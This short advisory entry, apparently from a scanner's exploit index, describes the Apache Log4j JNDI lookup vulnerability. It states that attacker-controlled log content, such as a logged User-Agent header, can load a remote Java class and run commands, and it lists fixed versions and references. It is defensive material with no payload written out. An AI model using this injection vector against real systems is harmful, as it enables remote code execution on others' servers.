Apache Log4j JNDI message lookup vulnerability

Added: 12/16/2021

Background

Apache Log4j is a logging library used by many Java applications.

Problem

An attacker who is able to control log message content could embed a JNDI reference to an LDAP or RMI URL which downloads an executable Java class, leading to arbitrary command execution.

Resolution

Upgrade to Apache Log4j 2.12.2 or 2.16 or higher, or apply a fix from the vendor of the software which embeds Log4j.

References

https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance
https://logging.apache.org/log4j/2.x/security.html
https://isc.sans.edu/diary/28120

Limitations

Exploit works on web applications which use Log4j to log the User-Agent header.

Platforms

Windows
Linux

Back to exploit index